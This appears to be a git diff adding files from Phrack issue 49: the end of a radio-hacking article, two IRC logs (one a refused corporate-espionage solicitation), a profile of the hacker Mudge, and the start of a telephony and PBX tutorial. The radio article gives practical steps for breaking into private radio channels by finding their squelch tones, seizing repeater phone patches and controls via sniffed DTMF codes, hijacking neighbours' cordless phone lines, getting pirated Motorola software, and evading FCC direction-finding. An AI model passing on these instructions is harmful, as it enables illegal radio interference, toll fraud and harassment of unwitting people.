+1GHz (thats 1000MHz lamer!), and yes that *includes* cell phones.  You also 
+want to get the FTT-12 keypad which adds PL capabilities and other cool stuff
+including audio sampling.  So you get a killer radio, scanner, and red box all
+in one! Yaesu recently got some heat for this radio so they changed the eprom
+on newer radios, but they can modified as well, so no worries.
+
+   Now for some radio basics.  There are several different modulation schemes,
+SSB - Single Side Band, AM - Amplitude Modulation, FM - Frequency Modulation,
+etc.  The most common type above HF communications is NFM, or Narrow band 
+Frequency Modulation.
+
+There are three basic ways communication works:
+
+Simplex - The Transmit and Receive frequencies are the same, used for short
+distance communications.
+
+Repeater - The Transmit and Receive frequencies are offset, or even on
+different bands.
+
+Trunking - A bunch of different companies or groups within a company share
+multiple repeaters.  If you're listening to a frequency with a scanner and
+one time its your local Police and the next it's your garbage man, the fire
+dept... - that's trunking.  Similar to cell phones you get bits and pieces 
+of conversations as calls are handed off among repeater sites.
+
+   Their radios are programmed for specific "talk groups", so the police only
+hear police, and not bruno calling into base about some weasel kid he found
+rummaging through his dumpsters.  There are three manufacturers - Motorola,
+Ericsson (GE), and EF Johnson.  EFJ uses LTR which sends sub-audible codes 
+along with each transmission, the other systems use a dedicated control 
+channel system similar to cell phones.  Hacking trunk systems is an entire 
+article in itself, but as should be obvious, take out the control channel 
+and the entire system crashes (in most cases).
+
+   OK so you got your new radio you tune around and your find some security
+goons at the movie theater down the street.  They are total losers so you
+start busting on them.  You can hear them, but why they can't hear you?
+The answer-- SubAudible Tones.  These are tones that are constantly
+transmitted with your voice transmission - supposedly subaudible, but if
+you listen closely you can hear them.  With out the tone you don't break
+their squelch (they don't hear you.)  These tones are used keep nearby
+users from interfering with each other and to keep bozos like you from
+messing with them.  There are two types, CTCSS Continuos Tone-Codes Squelch
+system (otherwise known as PL or Privacy Line by Motorola) or DCS Digital
+Coded Squelch (DPL - Digital Privacy Line).  If you listened to me and got
+that FT-50 you will be styling because its the only modable dual band that
+does both.  So now you need to find their code, first try PL because its
+more common.  There is a mode in which the radio will scan for tones for
+you, but its slow and a pain.  The easiest thing to do is turn on Tone
+Squelch, you will see the busy light on your radio turn on when they are
+talking but you wont hear them.  Go into the PL tone select mode and tune
+through the different tones while the busy light remains on, as soon as you
+hear them again you have the right tone, set it and bust away!  If you
+don't find a PL that works move on to DPL.  There is one other squelch
+setting which uses DTMF tone bursts to open the squelch, but its rarely
+used, and when it is used its mostly for paging and individuals.
+
+   Now you find yourself at Defcon, you hear DT is being harassed by
+security for taking out some slot machines with a HERF gun, so you figure
+it's your hacker responsibility to fight back.  You manage to find a
+security freq, you get their PL, but their signal is very weak, and only
+some of them can hear your vicious jokes about their moms.  What's up?  They
+are using a repeater.  A handheld radio only puts out so much power,
+usually the max is about 5 watts.  That's pretty much all you want radiating
+that close to your skull (think brain tumor).  So a repeater is radio that
+receives the transmissions from the handhelds on freq A and then
+retransmits it with a ton more watts on freq B.  So you need to program
+your radio to receive on one channel and transmit on another.  Usually
+repeaters follow a standard rule of 5.0MHz on UHF and .6MHz on VHF, and
+they can either be positive or negative offsets.  Most radios have a
+auto-repeater mode which will automatically do the offset for you or you
+need to place the TX and RX freqs in the two different VCOs.  Government
+organizations and people who are likely targets for hacks (Shadow Traffic
+news copter live feeds) use nonstandard offsets so you will just need to
+tune around.
+
+   Some ham radios have an interesting feature called crossband repeat.
+You're hanging out at Taco Bell munching your Nachos Supreme listening to the
+drive thru freq on your radio.  You notice the Jack in the Box across the
+street, tuning around you discover that TacoHell is on VHF (say 156.40) and
+Jack in the Crack is on UHF (say 464.40).  You program the two freqs into
+your radio and put it in xband repeat mode.  Now when someone places their
+order at Taco they hear it at Jacks, and when they place their order at
+Jacks they hear it at Taco.  When the radio receives something on 156.40 it
+retransmits it on 464.40, and when it receives something on 464.40 it
+retransmits it on 156.40.
+
+"...I want Nachos, gimme Nachos..."  
+"...Sorry we don't have Nachos at Jack's..." 
+"...Huh? Im at Taco Bell..."  
+Get it?  Unfortunately the FT-50 does not do xband repeat, that's the only 
+feature it's lacking.
+
+   Damn it, all this RF hacking is fun, but how do I make free phone calls?
+Well you can, sort of.  Many commercial and amateur repeaters have a
+feature called an autopatch or phonepatch.  This is a box that connects the
+radio system to a phone line so that you can place and receive calls.  Keep
+in mind that calls are heard by everyone who has their radio on! The
+autopatch feature is usually protected by a DTMF code.  Monitor the input
+freq of the repeater when someone places a call you will hear their dtmf
+digits - if you're super elite you can tell what they are by just hearing
+them, but us normal people who have lives put the FT-50 in DTMF decode mode
+and snag the codez...  If your radio doesn't do DTMF decode, record the audio
+and decode it later with your soundblaster warez.  Most of the time they
+will block long-distance calls, and 911 calls.  Usually there is a way
+around that, but this is not a phreaking article.  Often the repeaters are
+remote configurable, the operator can change various functions in the field
+by using a DTMF code.  Again, scan for that code and you too can take
+control of the repeater.  What you can do varies greatly from machine to
+machine, sometimes you can turn on long-distance calls, program speed-dials,
+even change the freq of the repeater.
+
+   What about cordless phones, can't I just dial out on someone's line?
+Sort of.  You use to be able to take a Sony cordless phone which did
+autoscanning (looked for an available channel) drive down the block with
+the phone on until it locked on to your neighbors cordless and you get a
+dialtone.  Now cordless phones have a subaudible security tone just like PL
+tones on radios so it doesn't work anymore.  There are a bunch of tones and
+they vary by phone manufacturer, so it's easier to make your free calls other
+ways.
+
+   But as I mentioned before you can screw with people, not with your FT-50
+though.  Cordless phones fall very close to the 6 meter (50MHz) HAM band and
+the lowband commercial radio frequencies.  There are 25 channels with the
+base transmitting 43-47MHz and the handset from 48-50MHz.  What you want to
+do is program a radio to receive on the base freqs and transmit on the
+handset freqs.  The phones put out a few milliwatts of power (very little).
+On this freq you need a fairly big antenna, handhelds just don't cut it - 
+think magmount and mobile.  There are HAM radios like the Kenwood TM-742A 
+which can be modified for the cordless band, however I have not found a 
+radio which works really well receiving the very low power signals the 
+phones are putting out.   So, I say go commercial!  The Motorola 
+Radius/Maxtrac line is a good choice.  They have 32 channels and put out 
+a cool 65watts so your audio comes blasting out of their phones.  Now 
+the sucko part, commercial radios are not designed to be field 
+programmable.  There are numerous reasons for this, mainly they just want 
+Joe rentalcop to know he is on "Channel A" , not 464.500.  Some radios are 
+programmed vie eproms, but modern Motorola radios are programmed via a 
+computer.  You can become pals with some guy at your local radio shop and 
+have him program it for you.  If you want to do it yourself you will need
+a RIB (Radio Interface Box) with the appropriate cable for the radio, and
+some software.  Cloned RIB boxes are sold all the time in rec.radio.swap 
+and at HAM swap meets.  The software is a little more difficult, Motorola 
+is very active in going after people who sell or distribute thier software
+(eh, M0t?) They want you to lease it from them for a few zillion dollars.
+Be cautious, but you can sometimes find mot warez on web sites, or at HAM
+shows.   The RIB is the same for most radios, just different software, you
+want Radius or MaxTrac LabTools.  It has built in help, so you should be 
+able to figure it out.  Ok so you got your lowband radio, snag a 6 meter 
+mag mount antenna, preferably with gain, and start driving around.  Put 
+the radio in scan mode and you will find and endless amount of phone calls
+to break into.  Get a DTMF mic for extra fun, as your scanning around listen
+for people just picking up the phone to make a call.  You'll hear dialtone,
+if you start dialing first since you have infinitely more power than the 
+cordless handset you will overpower them and your call will go through.  
+It's great listening to them explain to the 411 operator that their phone is
+possessed by demons who keep dialing 411.  Another trick is to monitor the 
+base frequency and listen for a weird digital ringing sound - these are tones
+that make the handset ring.  Sample these with a laptop or a yakbak or
+whatever and play them back on the BASE frequency (note, not the normal
+handset freq) and you will make their phones ring.  Usually the sample won't
+be perfect so it will ring all wacko.   Keep in mind this tone varies from
+phone to phone, so what works on one phone wont work on another.
+
+   Besides just scanning around how do you find freqs?  OptoElectronics
+makes cool gizmos called near-field monitors.  They sample the RF noise
+floor and when they see spikes above that they lock on to them.  So you
+stick the Scout in your pocket, when someone transmits near you, the scout
+reads out their frequency.  The Explorer is thier more advanced model which
+will also demodulates the audio and decode PL/DPL/DTMF tones.  There are
+also several companies that offer CDs of the FCC database.  You can search
+by freq, company name, location, etc.  Pretty handy if your looking for a
+particular freq.  Percon has cool CDs that will also do mapping.  Before
+you buy anything check the scanware web site, they are now giving away
+their freq databases for major areas.
+
+  OK radioboy, you're hacking repeaters, you're causing all the cordless
+phones in your neighborhood to ring at midnight, and no one can place 
+orders at your local drivethrus.  Until one day, when the FCC and FBI 
+bust down your door.  How do you avoid that??  OK, first of all don't 
+hack from home.  Inspired people can eventually track you down.  How?
+Direction Finding and RF Fingerprinting.  DF gear is basically a 
+wideband antenna and a specialized receiver gizmo to measure signal 
+strength and direction.  More advanced units connect into GPS units for 
+precise positioning and into laptops for plotting locations and advance 
+analysis functions such as multipath negations (canceling out reflected 
+signals.)  RF finger printing is the idea that each individual radio has
+specific characteristics based on subtle defects in the manufacture of the 
+VCO and AMP sections in the radio.  You sample a waveform of the radio and
+now theoretically you can tell it apart from other radios.  Doesn't really 
+work though-- too many variables.  Temperature, battery voltage, age, 
+weather conditions and many other factors all effect the waveform.  
+Theoretically you could have a computer scanning around looking for a 
+particular radio, it might work on some days. Be aware that fingerprinting
+is out there, but I wouldn't worry about it *too* much.  On the other hand
+DF gear in knowledgeable hands does work.  Piss off the right bunch of HAMS 
+and they will be more than happy to hop in their Winnebego and drive all 
+over town looking for you.  If you don't stay in the same spot or if you're 
+in an area with a bunch of metal surfaces (reflections) it can be very very 
+hard to find you.  Hack wisely, although the FCC has had major cutbacks 
+there are certain instances in which they will take immediate action.  They 
+are not going to come after you for encouraging Burger King patrons to become 
+vegetarians, but if you decide to become an air-traffic controller for a day
+expect every federal agency you know of (and some you don't) to come looking 
+for your ass.
+
+   My plane is landing so thats all for now,  next time - advanced RF hacking,
+mobile data terminals, van eck, encryption, etc.
+
+
+EOF
+
+
+                                ----<>----
+
+
+10.16.96
+
+Log from RAgent
+
+GrimReper: I work For Phrack
+GrimReper: Yeah
+GrimReper: I gotta submit unix text things like every month
+GrimReper: I've been in Phrack for a long time
+GrimReper: Phrack is in MASS
+-> *grimreper* so how much does Phrack pay you?
+*GrimReper** How much?
+*GrimReper** Hmm......
+*GrimReper** About $142
+-> *grimreper* really
+-> *grimreper* who paid you?
+*GrimReper** w0rd
+*GrimReper** CardShoot
+*GrimReper** Cardsh00t
+-> *grimreper* hmm, I don't see any "cardsh00t" in the credits for phrack
++48
+*GrimReper** There is
+-> *grimreper* you might as well stop lying before I bring in daemon9,
++he's another friend of mine
+-> *grimreper* he's one of the editors of phrack
+*GrimReper** Get the latest Phrack?
+*GrimReper** Its gonna have my NN
+*GrimReper** watch
+-> *grimreper* not anymore
+*GrimReper** Go Ahead
+-> *grimreper* actually
+*GrimReper** so?
+-> *grimreper* you will be mentioned
+-> *grimreper* you'll be known as the lying fuckhead you are, when this
++log goes in the next issue
+
+        
+                                ----<>----
+10.24.96
+
+Log from Aleph1
+
+*** ggom is ~user01@pm1-6.tab.com (ggom)
+*** on irc via server piglet.cc.utexas.edu ([128.83.42.61] We are now all
+  piglet)
+*ggom* i am assembling a "tool shed".  A "shed" for certain "expert" activity.
+    Can you help?
+-> *ggom* maybe... go on
+*ggom* i represent certain parties that are looking for corporate information.
+   this would fall under the "corporate espionage" umbrella
+*ggom* this information could probably be obtained via phone phreak but access to
+  corporate servers would be a plus...can you help?
+-> *ggom* a) how do I know you are not a cop/fed? b) why did you come to #hack
+  to ask for this? b) what type of data you after? c) what type of money are 
+ you talking about?
+*ggom* where else should i go to ask for this stuff????????
+-> *ggom* you tell me.  How do you know about #hack?
+*ggom* looked it up on the irc server...figured this was a good place to
+  start...........     i am talking about 4 to 5 figures here for the information
+-> *ggom* you are also talking 4 to 5 years
+-> *ggom* #hack is visited regularly by undercovers and the channel is logged
+-> *ggom* talking openly about such thing is not smart
+*ggom* whatever...........  man, if you are GOOD, you are UNTRACEABLE.  i
+  guess i am looking in the wrong place......
+-> *ggom* you been watching way to many times "Hackers" and yes #hack is the
+  wrong place...
+*ggom* we are on a private channel.........suggest a more private setting....
+-> *ggom* sorry you started off on a bad foot. If you got a million to spare
+  for such information you would also have the resources to find the
+  appropiate person to do the job. So you either are full off it, are a fed,
+  or just plain dumb. This conversation ends here.
+*ggom* later
+*ggom* not talking a million.. talking 5 to 6 figures.........    you are
+  right
+*ggom* talk to me.......
+*ggom* talk to me.......
+
+
+                                ----<>----
diff --git a/phrack49/4.txt b/phrack49/4.txt
new file mode 100644
index 0000000..7277b7a
--- /dev/null
+++ b/phrack49/4.txt
@@ -0,0 +1,159 @@
+                              .oO Phrack 49 Oo.
+
+                          Volume Seven, Issue Forty-Nine
+
+                                    4 of 16
+
+                           -:[ Phrack Pro-Phile ]:-
+                   
+   We discussed for a long time who in the hacking world today best 
+exemplifies everything that is right with hacking today, and we came
+up with a unanimous conclusion that it was Mudge.  And so we were quite
+happy that our first choice for the first pro-phile that we have done
+accepted our invitation.  He cracked your Apple warez when you couldn't, 
+he wrote buffer overflows before they were cool, he owned your Sendmail 
+(and probably still does), and he still manages to give more back to the 
+community than anyone else around.  We can't say much more about him so
+let's see what he has to say for himself...  
+
+                                  Mudge
+                                  ~~~~~
+
+ Personal
+ ~~~~~~~~
+             Handle: mudge 
+           Call him: Enough people know it that its not secret, if you know
+                     it great, if not you probably don't have to. 
+       Past handles: Many old Apple ][ crackers remember me by a different
+                     handle.  That handle is long put to rest thanks to the
+                     government.
+      Handle origin: Mudge is a very common Irish last name.  Though I'm not
+                     Irish I met someone with the name and couldn't believe
+                     it was a proper name.  Out of homage to this person I
+                     took it as a handle several years ago (and since I 
+                     couldn't use the old one for legal reasons). 
+      Date of Birth: Mid to Late '60s 
+Age at current date: Mid to Late 20s 
+             Height: 6'0"
+             Weight: 150
+          Eye color: Blue
+         Hair Color: Brownish / dirty blonde and loooong
+           Computer: MPP Risc machine with 16 processors, 4 processor i860
+                     Cadmus, 2 Sparcs, my original Apple ][+, NeXT cube,
+                     486, 4 Sun 3's, Textronix 4051, SouthWest Technical 
+                     Products 75 
+  Sysop/Co-Sysop of: Cell-Block, Magic Tavern, Co-Sysop on the old Circus
+                     and Circus-II boards, ATDT, Works, and various AEs
+                     scattered across the country.  And a little place
+                     called the l0pht.
+  Boards Frequented: Terrapin Station, Metal Shop, Black Crawling Systems, 
+                     Used to hang on Rutgers' with the old Darpa people
+                     (they know who they are) through telenet. 
+        Net address: mudge@l0pht.com
+
+
+Favorite Things
+~~~~~~~~~~~~~~~
+      Women: Not a big womanizer, when I hook up with someone it's usually
+             for quite some time.  Though it's always nice when big companies
+             try to bribe you other ways.  (Moreso 'cause it shows how sleazy
+             the big companies are in comparison to human beings :>)
+       Cars: Ford GT40, Porsche Wolf, Ferrari 318's, and of course a black
+             SVT Cobra with black leather interior. 
+      Foods: Beer
+      Beers: Mateen Triple - with a runner up of Pilsner Urquell 
+      Music: Frank Zappa, Dream Theater, Rush, Gentle Giant, King Crimson 
+Instruments: Guitar.  I actually hold advanced degrees in music (hehe had
+             to make some money so here I am back in the 'puter world).
+    Guitars: Ibanez 7 string, Gibson es225 Jazzer, and a custom built Ibanez
+             from an endorsement deal (which is signed by 2 porn stars)
+      Books: Jack of Shadows, Roadmarks, Stranger in a Strange Land, 
+             This Immortal, Steal this Urine Test, Steal this Book, PANIC -
+             the wonderful Sparc buffer overflow writers bible.
+   Turn Ons: Pet Rocks
+  Turn Offs: 7/11 employees who think they can dance to Frank Zappa
+
+Other Passions, Interests, Loves:
+
+I love running the l0pht and the people that are involved in it.  There's
+nothing like knowing that you are, at least attempting, to keep information
+flowing and offering back to the community.  I love a lot of things.  It's
+nice to see there is a sense of humor in the scene, and that there are still
+enough old-school hackers that are willing to help if approached correctly
+Granted there aren't enough of the older ones to answer every aol.com
+e-mail...  It's a great feeling to be beneficial to both sides.  For instance:
+when the 8.7.5 sploit went out and when we were doing a lot of work on SecureID
+(which much to their schagrin we got *really* far) that both the people writing
+the software and the hackers were happy to see our results.  It's all about
+information and learning.  If you stop learning... you're not doing it right.
+Unfortunately... it usually takes disseminating sploits to get some of the
+large companies to fix their buggy software. 
+  
+
+Most Memorable Experiences
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+Having a bunch of suits get out of, yes, K-cars and take away most of my
+belongings - learning 6502 (and living it) assembler - writing my first
+buffer overflow a few years back - the band cutting it's first audio CD -
+playing the music for one of Hobbit's laser shows - having Wietse Venema
+ask me "not" to break into bell labs at a talk he was giving - having the
+bellcore author of the OTP RFC write me e-mail realizing that I had beaten
+him to the punch with vulnerabilities - everyday that I spend with my
+girlfriend - hearing one of the songs I wrote and played on being played
+on the radio - The L0pht and it's people - everytime that you finish working
+on a new project and it actually works [especially when you are working on
+a hypothetical exploit and it pans out].
+
+
+Some People to Mention
+~~~~~~~~~~~~~~~~~~~~~~
+Cheshire Catalyst for the initial inspiration.  The L0pht folks, Raven, 
+Hobbit for being a flat out brilliant fucker, ReDragon (best sense of humor -
+and best patience... look who he works for ;-)), Glyph - one nasty coder,  
+Squarewave for providing countless hours of ooh's and aahhh's while 
+pouring through his code.  The NewHack folks. G-heap, Pope, SpaceRogue, 
+Kingpin, Tan, Weld, Stefan, Brian Oblivion, t-com, all the standard
+people that hang out and have a good time at the cons with the l0pht folks
+(ie the r00t, NHC, l0ck/anti l0ck, cDc...) shit ALL the cDc folks. etc.,
+etc. etc.  The ASR guys.  There are so many people that have contributed so 
+much. I'm sure I've left out many.   
+
+The biggest one: my father [the only person who could sit there and grin 
+through all of it... and explain the leafing  procedures and how the 6502 
+REALLY worked] (that's not leafing through on the Apple ][+... two 
+separate things).  
+  
+
+A few things you would like to say:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+French Toast please...
+
+31337 is not a strong XOR key...
+(unless your secret host key is less than 5 characters long)
+
+Thanks to the new phrack lineup for keeping a good thing going.
+Still remember DL'ing the latest ones along with the Countlegger series
+and having to Dalton's Disk Disintegrator them back together.
+
+Oh yeah... 
+and if someone tells you something is secure... 
+ask them to prove it, and then STILL don't believe them.
+
+
+~~~~~~~~~~~~~~~~~~~~~
+One last thing, in your personal experience, have you found that most
+people in the scene are pretty much computer geeks?
+
+"Absolutely not.  I've had the privilege to hang out with everyone from
+Weitse Venema, Dan Farmer, Casper Dik, Peter Guttman, to the hacker scene
+like Hobbit, Daemon9, the l0pht folks... and there's very few out of the
+bunch that I would label 'computer geeks'.  Computer geeks seem not to have
+that creative twist in many cases that hackers have.  This is the same twist
+that says: I don't care what it's _supposed_ to do - I bet I can make it do
+*this*."
+
+Thanks a lot for the prophile.
+
+"Thanks a lot for the opportunity."
+
diff --git a/phrack49/5.txt b/phrack49/5.txt
new file mode 100644
index 0000000..cd03c56
--- /dev/null
+++ b/phrack49/5.txt
@@ -0,0 +1,2446 @@
+                                .oO Phrack 49 Oo.
+
+                          Volume Seven, Issue Forty-Nine
+                                     
+                                  File 05 of 16
+
+
+                         Introduction to Telephony and PBX
+				   by Cavalier[TNO]
+
+                                Table of Contents
+
+
+       1. . . . . . . . . . . . . . . . . . . . The Central Office
+       2. . . . . . . . . . . . . . .Private Branch Exchange (PBX)
+       3. . . . . . . . . Properties of Analog and Digital Signals
+       4. . . . . . . . . . . . . . . . .Analog-Digital Conversion
+       5. . . . . . . . . . . . . . . . . . . Digital Transmission
+       6. . . . . . . . . . . . . . . . . . . . . . . Multiplexing
+       7. . . . . . . . . . . . . . . . . . . . Transmission Media
+       8. . . . . . . . . . . . . . . . . . . . . . . . .Signaling
+
+
+	.--------------------.
+1	| The Central Office |
+	`--------------------'
+
+Telephones alone do nothing special.  Their connection to the rest of
+world makes them one of mankind's greatest achievements.
+
+In the early days of telephone communications, users had to establish
+their own connections to other telephones.  They literally had to string
+their own telephone lines.
+
+Although the customer inconvenience of building their own connections
+limited the availability of phone service, an even greater problem soon
+arose.  As the telephone became more popular, more people wanted to be
+connected.   At the time, each phone had to be directly wired to each
+other.  In a very short time there was a disorganized maze of wires
+running from the homes and businesses.
+
+A simple mathematical formula demonstrates the growth in the number of
+connections required in a directly wired network:
+
+                              I = N(N-1)/2
+       (I = number of interconnections; N = number of subscribers)
+
+                            I = 100(100-1)/2
+
+If just 100 subscribers attempted to connect to each other, 4950
+separate wire connections would be needed!  Obviously, a better method
+was needed.
+
+
+Switching
+
+
+A Central Office (CO) switch is a device that interconnects user
+circuits in a local area, such as a town.  The CO is a building where
+all subscriber phone lines are brought together and provided with a
+means of interconnection.  If someone wants to call a neighbor, the call
+is routed through the CO and switched to the neighbor.
+
+What if someone wanted to call a friend in the next town?  If their
+friend was connected to a different CO, there was no way to communicate.
+
+The solution was to interconnect COs.  Then, CO-A routed calls to CO-B
+to complete the connection.
+
+Today every CO in the world is connected to every other CO in a vast
+communication highway known as the Public Switched Network (PSN).  The
+PSN goes by a variety of different names:
+
+                 Dial-up network
+                 Switched network
+                 Exchange network
+
+The CO provides all users (subscribers) with a connection to each other.
+A critical note, however, is that no CO has the resources to switch all
+their users simultaneously.  It would be too expensive and it is
+unnecessary to attempt to do so because for the vast majority of the
+time, only a small percentage of subscribers are on the phone at the
+same time.
+
+If, on a rare occasion, all the circuits are busy, the next call will be
+blocked. A call is blocked if there are no circuits available to switch
+it because all the circuits are in use.
+
+The term `probability of blocking` is a statistical logarithm which
+determines the chance that a call cannot be switched.  For modern day
+commercial COs, the probability of blocking is very low.
+
+
+History of COs
+
+
+Operating switching
+
+In the first COs, a subscriber who wanted to place a call cranked a
+magneto-generator to request service from the local phone company.  An
+operator at the CO monitored subscriber connections by observing lamps
+on a switchboard console.  When a subscriber's lamp lit, indicating the
+request for service, the operator would answer: "Number please...".
+
+The operator connected one call to another by plugging one end of a cord
+into the jack of the caller  and the other end of the cord into the jack
+of the called party, establishing a manual, physical connection.
+
+The switchboard had to have a jack for every incoming and outgoing line
+that needed service.  The number of lines an operator could monitor was
+limited by her arm's reach.   Billing was accomplished by the operators
+writing up a ticket for each call designating its starting and ending
+times.
+
+When telephone subscribers were few in number, this method worked fine.
+As the popularity of the phone increased, more phones placed more calls
+and it became increasingly unmanageable and expensive to manually switch
+and bill each call.
+
+Strowger Step-by-Step Switch
+
+A mechanical switch was invented in the 1890's by a Kansas City
+mortician named Almon B. Strowger.  He became very suspicious because
+callers looking for a mortician were continually referred to his
+competition instead to him. When he learned that the local operator was
+the wife of his rival, his suspicions were confirmed.  He set about to
+invent a switching system that would not be dependent upon human
+intervention.
+
+His creation, called the Strowger or Step-by-Step switch, was the first
+automated electromechanical switching system.  It placed switching
+control in the hands of the subscriber instead of the operator by adding
+a dialing mechanism to the phone.
+
+The Strowger switch completed a call by progressing digit by digit
+through two axes of a switching matrix in the CO.  A call was stepped
+vertically to one of ten levels and rotated horizontally to one of ten
+terminals.
+
+It was called step-by-step because calls progress one step at a time as
+the customer dialed each digit of the number.  When the final digit was
+dialed, the switch seized an available circuit and connected the call.
+
+The result of the step-by step switch was to eliminate the need for
+manual operator connection and grant privacy and call control to the
+subscriber.
+
+The step-by-step switch was a wonderful invention for its day.   Today
+it is obsolete.  Compared to modern day switches, it is slow, noisy
+and too expensive to maintain.  It is also both bulky and inefficient.
+
+The Crossbar Switch
+
+The crossbar switch was invented and developed in the late 1920s.  One
+of its main technological advanced was the introduction of a hard wired
+memory to store dialed digits until the dialing was complete.
+
+Unlike the step-by-step method, calls are not processed under the
+direct control of incoming dial pulses.  In the step-by-step method,
+each phone call controlled its own pathway through the switching matrix
+at the speed the digits were dialed by the user.  The crossbar switch
+introduced a better method.
+
+Devices called registers stored the digits in memory as they were dialed
+by the callers.  Not until all the digits were dialed would the call
+begin to be switched.  Once all the digits were received and stored in
+the register, the register handed the digits to a processor to be
+examined and used to route the call.
+
+When a pathway had been established and the call was connected, the
+register and processor would release and become available to handle
+another call. Collectively, this process was called `common control`.
+
+Common control resulted in faster call completion and increased capacity
+of the switch.  With the old step-by-step, the time it would take a user
+to physically dial the digits would occupy valuable switch time because
+dialing the digits was the most time consuming part of switching a call.
+This 8 to 12 seconds of dialing time prevented other users from
+accessing the switching matrix and generally slowed things down.
+
+The genius of the crossbar common control was to store the dialed digits
+as they came in and then after the user finished dialing, send the
+digits off for processing.  The act of dialing no longer kept other
+calls waiting for switch resources.
+
+Common control created the separation of the control functions (setting
+up and directing the call) from the switching functions (physically
+creating the connections).
+
+Crossbar Switching Matrix
+
+Calls were connected by sharing a dedicated wire path through the
+switching matrix.  Crossbar switches used the intersection of two points
+to make a connection.  They selected from a horizontal and vertical
+matrix of wires, one row connected to one column.  The system still
+stepped the call through the network, but only after all the digits were
+dialed.  This method created a more efficient allocation of switch
+resources.
+
+There are four important components of a crossbar switch.
+
+   .  The marker is the brain of a crossbar switch.  It identifies a
+      line requesting service and allocates a register.
+
+   .  The register provides dial tone and receives and stores the dialed
+      digits.
+
+   .  The matrix is a set of horizontal and vertical bars.  The point at
+      which the crosspoints meet establishes the connection.
+
+   .  A trunk interface unit, also called a sender, processes calls from
+      a PBX.
+
+Although crossbar is faster and less bulky than step-by-step, it is
+still electromechanical and requires a lot of maintenance.  It requires
+huge amounts of space, generates a lot of heat, and makes a great deal of
+noise.
+
+Electronic Switching System  (ESS)
+
+The advent of electronic switching (also called stored program
+switching) was made possible by the transistor.  Introduced in 1965, the
+Electronic Switching System (ESS) greatly sped up switch processing
+capacity and speed and has done nothing less than revolutionize the
+industry.
+
+Modern ESS switches perform five main functions to establish and
+maintain service in a public network.
+
+   1. Establish a connection between two or more points
+   2. Provide maintenance and testing services
+   3. Record and sort customer billing charges
+   4. Offer customer features, such as call waiting
+   5. Allow access to operators for special services
+
+An ESS uses computer-based logic to control the same two primary
+operations we introduced with the crossbar -- common control and the
+switching matrix.
+
+(In an ESS, the terms stored program control, common control, and
+electronic switching are all synonymous.)
+
+ESS Common Control
+
+The function of the common control is similar to its function in the
+crossbar. The difference is that common control is accomplished
+electronically instead of electromechanically.  Like the crossbar, one
+group of control devices controls the functions of all lines.  However,
+instead of the hard wired logic of the crossbar, the control device
+consists of a computer with memory, storage, and programming capability.
+
+In the ESS, the computer governs the common control.  It monitors all
+the lines and trunks coming into the CO, searching for changes in the
+electrical state of the circuit, such as a phone going off-hook.  When a
+subscriber goes off- hook and dials a number, the common control
+equipment detects the request for service and responds by returning the
+dial tone.  It then receives, stores, and interprets the dialed digits.
+
+Again, similar to the workings of the crossbar, once the digits have
+been processed, the computer establishes a path through the switching
+matrix to complete the call.  After the connection for the call has been
+established, the common control equipment releases and becomes available
+to complete other calls.
+
+ESS Switching Matrix
+
+Recall that in the crossbar, calls were connected by sharing a dedicated
+wire path through the matrix, establishing a connection between an input
+and an output.  The matrix in an ESS is logically similar to the
+crossbar grid except the pathway is electronic instead of
+electromechanical.  Called a TDM bus, it is solid state circuitry and is
+printed into small computer controlled circuit boards.  The computer
+controls the connections and path status map to determine which path
+should be established to connect the calling and called parties.
+
+Remember
+
+      Crossbar switching matrix  =  maze of physical wire cross connections
+
+      ESS switching matrix  =  electronic multiplexed TDM (time division
+      multiplexing) bus
+
+ESS Advancements
+
+The unprecedented advancement of the ESS was the speed and processing
+power advantage it had over the crossbar because it switched calls
+digitally instead of electromechanically.  The processing capacity that
+would have required a city block of crossbar technology could be
+accomplished by one floor of ESS equipment.  Much less effort was
+required to maintain the ESS because it was smaller and had fewer moving
+parts.
+
+Telephone companies would have moved to the new technology for these
+advantages alone.  But, there was much more to be offered.  There was
+the power of the computer.
+
+There are major advantages to a computer stored program.  It allows the
+system to perform functions earlier switches were incapable of.  For
+example, the switch can collect statistical information to determine its
+effectiveness.  It can perform self-diagnostics of circuit and system
+irregularities and report malfunctions.  If trouble occurs, technicians
+can address it via a keyboard and terminal.  The same terminal, often
+called a system managers terminal, allows personnel to perform system
+changes and to load new software, eliminating the need for manually
+rewiring connections.
+
+The computer uses two types of memory:
+
+   .  Read Only Memory (ROM) is used to store basic operating
+      instructions and cannot be altered by the end user.  The contents
+      of this memory can only be changed by the manufacturer.
+
+   .  Random Access Memory (RAM) stores configuration and database
+      information.  The contents of its memory can be changed by a
+      system administrator.
+
+Other important functions of the computer include
+
+   .  Performing telephone billing functions
+   .  Generating traffic analysis reports
+   .  Generating all tones and announcements regarding the status of
+      circuits and calls
+
+Computer control operates under the direction of software called its
+generic program.  Periodically updating or adding to the generic program
+allows the ESS to be much more flexible and manageable than previous
+switch generations because it is the software, not the hardware, that
+normally has to be upgraded.
+
+Electronic switching heralded the introduction of new customer features
+and services.  Credit card calls, last number redial, station transfer,
+conference calling, and automatic number identification (ANI) are just 
+a few examples of unprecedented customer offerings.
+
+The ESS is an almost fail-safe machine.  Its design objective is one
+hour's outage in 20 years.  In today's competitive environment for
+higher quality communication equipment, ESS machines provide a level of
+service and reliability unachievable in the past.
+
+
+
+	.-----------------------------------.
+2	| The Private Branch Exchange (PBX) |
+	`-----------------------------------'
+
+The two primary goals of every PBX are to
+
+         . facilitate communication in a business
+         . be cost effective
+
+
+Organizations that have more than a few phones usually have an internal
+switching mechanism that connects the internal phones to each other and
+to the outside world.
+
+A PBX is like a miniature Central Office switching system designed for a
+private institution.  A PBX performs many of the same functions as a CO
+does. In fact, some larger institutions use genuine COs as their private
+PBX.
+
+Although a PBX and a CO are closely related, there are differences
+between them
+
+   .  A PBX is intended for private operation within a company.  A CO is
+      intended for public service.
+
+   .  A PBX usually has a console station that greets outside callers
+      and connects them to internal extensions.
+
+   .  Most PBXs do not maintain the high level of service protection
+      that must be maintained in a CO.  Assurance features such as
+      processor redundancy (in the event of processor failure) and
+      battery backup power, which are standard in a CO, may not be a
+      part of a PBX.
+
+   .  COs require a seven digit local telephone number, while PBXs can
+      be more flexible and create dialing plans to best serve their
+      users (3, 4 5, or 6 digit extensions).
+
+   .  A PBX can restrict individual stations or groups of stations from
+      certain features and services, such as access to outside lines.  A
+      CO usually has no interest in restricting because these features
+      and services are billed to the customer.  COs normally provide
+      unlimited access to every member on the network.
+
+A PBX is composed of three major elements.
+
